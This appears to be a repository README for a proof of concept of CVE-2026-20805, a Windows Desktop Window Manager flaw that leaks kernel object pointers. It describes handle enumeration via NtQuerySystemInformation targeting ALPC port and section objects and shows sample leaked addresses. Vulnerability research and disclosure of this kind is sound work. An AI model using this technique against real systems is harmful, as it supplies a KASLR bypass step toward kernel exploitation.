Proof of Concept demonstrating an information disclosure vulnerability in Microsoft Desktop Window Manager (dwm.exe).
This repository contains a custom Proof of Concept (PoC) developed to reproduce CVE-2026-20805, an information disclosure vulnerability affecting the Windows Desktop Window Manager process. The vulnerability allows a local authenticated user to leak kernel object pointers due to improper handling of ALPC-related structures, potentially weakening kernel exploit mitigations such as Kernel Address Space Layout Randomization (KASLR). This PoC was implemented independently after identifying instability and execution issues in existing public scripts, with the objective of producing reliable and verifiable results.
- CVE ID: CVE-2026-20805
- Vulnerability Type: Information Disclosure (CWE-200)
- Affected Component: Desktop Window Manager (
dwm.exe) - Attack Vector: Local
- Impact: Kernel address disclosure (KASLR bypass primitive)
- Severity: Medium
The PoC leverages low-level Windows Native APIs to enumerate system-wide handles and inspect kernel object metadata. It utilizes NtQuerySystemInformation with the SystemHandleInformation class to perform process-specific handle filtering and analyze ALPC Port and Section objects. Improperly initialized kernel object pointers are disclosed to user mode, confirming the information leakage.
Objects of Interest
- ALPC Ports (Type Index 24 / 25)
- Section Objects (Type Index 36)
During execution, the PoC successfully identified the dwm.exe process, enumerated hundreds of handles associated with Desktop Window Manager, and disclosed valid 64-bit kernel virtual addresses.
Author: UZAIR AMJAD-TEAM_ALKAHF
Sample Output
Handle: 0x0004
Object: 0xFFFFD58F80C0E5E0 (Kernel Object Pointer)
Handle: 0x011C
Object: 0xFFFFD58F80C0E1E0 (ALPC Section Address)
The leaked addresses fall within the expected kernel virtual address range, confirming successful information disclosure.